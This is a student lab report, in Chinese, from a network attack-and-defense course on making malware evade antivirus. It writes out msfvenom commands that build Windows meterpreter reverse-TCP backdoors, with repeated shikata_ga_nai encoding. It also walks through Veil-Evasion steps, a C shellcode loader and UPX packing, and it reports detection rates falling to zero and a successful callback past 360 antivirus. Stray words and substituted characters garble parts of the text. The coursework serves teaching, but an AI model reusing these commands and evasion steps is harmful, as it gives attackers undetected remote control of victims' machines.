20154319张武璐《网络对抗》免杀原理与实践

1、 实践内容（3.5分）

  1 .正确使用msf编码器，msfvenom生成如jar之类的其余文件，veil-evasion，本身利用shellcode编程等免杀工具或技巧；(1.5分)html

  2 .经过组合应用各类技术实现恶意代码免杀(1分)python

（若是成功实现了免杀的，简单语言描述原理，不要截图。与杀软共生的结果验证要截图。）shell

  3. 用另外一电脑实测，在杀软开启的状况下，可运行并回连成功，注明电脑的杀软名称与版本（1分）编程

2、基础问题回答

（1）杀软是如何检测出恶意代码的？windows

答：①基于特征码检测；若是一个可执行文件包含一段特征码则被认为是恶意代码，过期的特征码库就是没有用的，所以杀毒软件的更新很重要。数组

②启发式恶意软件检测；若是一个软件干的事一般是恶意软件才会干的，就可从中获得启发，把它看作是恶意软件。安全

③基于行为的恶意软件检测；至关因而启发式的一种，或者是加入了行为监控的启发式。网络

（2）免杀是作什么？tcp

答：免杀就是经过处理恶意软件好让其不被杀毒软件检测出来。函数

（3）免杀的基本方法有哪些？

答：①改变特征码；若只有exe能够经过加壳，包括压缩壳和加密壳来改变特征码。如有源代码，可用其余语言进行从新再编译（veil-evasion）。

②改变行为；通信方式尽可能使用反弹式链接、隧道技术或者加密通信数据。操做模式最好基于内存操做，减小对系统的修改，加入混淆做用的正常功能代码。

3、实验体会

1.经过实验深入的感受到杀毒软件其实很弱啊，我都能生成免杀的程序，更加令我吃惊的是竟然有程序能够在那么多杀毒软件检测中仅被检测出为安全，让我以为本身的电脑一直处在极度危险的状态中，网络安全仍是很重要的啊！

2.遇到的问题，就是生成zwl.exe文件，一开始电脑管家检测不出来，过一段时间再次运行就被提示为木马程序删除了，可是再次用c语言生成exe程序，仍是能够用的，就是周而复始。求解释！！！

4、离实战还缺些什么技术或步骤

     1.咱们要成功监听的话必需要靶机启动可执行文件，能够经过下载软件的时候能够捆绑到软件上，可是执行仍是有必定难度的。

     2.如今的杀毒软件的各类特征库更新的很快，要想达到实战还须要作到灵活更新。

5、实验过程

（一）正确使用msf编码器，veil-evasion，本身利用shellcode编程等免杀工具或技巧

本机IP：192.168.199.187

Linux的IP：192.168.199.132

1.msfvenom直接生成meterpreter可执行文件

（1）查看用msfvenom指令： msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.132 LPORE=4319 -f exe > 154319_backdoor.exe 生成的后门可执行文件的免杀效果

（2）打开网址在http://www.virscan.org/网站上查一下这个病毒能被多少杀软检测出来，发现有48%的杀软（19/39）报告发现病毒，说明这种方式造成的后门免杀效果不好

2.Msfvenom使用编码器生成meterpreter可执行文件

（1）msfvenom使用编码器，输入指令： msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.199.132 LPORT=4319 -f exe > 1543190_backdoor.exe

（2） 查看生成的后门文件的免杀效果，发现有48%的杀软（19/39）报告发现病毒，我觉得说编码会下降检出率，结果却差很少，没有什么变化

3.屡次编码

（1）尝试多编码几回，输入指令： msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b  ‘\x00’ LHOST=192.168.199.132 LPORT=4319 -f exe > 15431900_backdoor.exe

（2） 查看生成的后门文件的免杀效果，网站上显示个人病毒名字有违法或广告关键字，因此修改病毒名称为1543191

（3）发现有46%的杀软（18/39）报告发现病毒，看来多编码几回也并无什么用

（二）使用Veil-Evasion生成可执行文件（Linux地址：172.30.5.74）

1.Veil-Evasion是一个免杀平台，与Metasploit有点相似，默认没装

2..安装veil-evasion

参考网址：http://www.freebuf.com/sectool/89024.html

3.输入指令： veil-evasion ，打开软件，自动列出可用的指令

4.输入use选择34 python/meterpreter/rev_tcp

5.设置反弹回连的IP为172.30.5.74：和端口号为：4319

6.输入指令 generate ,设置生成的可执行文件名为zwl356：,并选择使用pathon语言进行编写

7.在/var/lib/veil-evasion/output/compiled/下找到zwl1文件，生成exe文件，传到Windows检测

（接下来是见证奇迹的时刻？？）

检验免杀效果，发现只有2%的杀软（1/39）报告发现病毒，Veil-Evasion的免杀效果这么好，我竟然生成了一个判断为非病毒的程序

（三）C语言调动shellcode（Linux地址：172.30.3.132  和 192.168.199.132）

（1）使用指令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.3.132 LPORT=443 -f c , 会生成一个c语言格式的Shellcode数组

(2)将这些特征码复制到windows上,用Dev-C++加上主函数后编译运行生成的可执行文件

（3）运行zwl.exe文件，没有提示木马文件

（4）用电脑管家查杀，没有被发现

（5）在网址http://www.virscan.org/查看发现有10%的杀软（4/39）报告发现病毒，比以前的结果好不少，不少杀毒软件检测不出

（6）运行回连kali,回连成功

（7）在过一段时间，再下一次运行zwl.exe程序时，被检测出为木马程序被清除

（8）用upx加壳，命名为zwl_jiake.exe

（9）检测加壳后的程序免杀效果，发现没有杀软（0/39）报告发现病毒（奇迹+1）

（四）用另外一电脑实测，在杀软开启的状况下，可运行并回连成功，注明电脑的杀软名称与版本

版本：

杀软：360杀毒

1.将后门程序传到靶机的电脑上，回连个人kali

2.检查免杀效果，发现360杀毒没有检测出来，免杀成功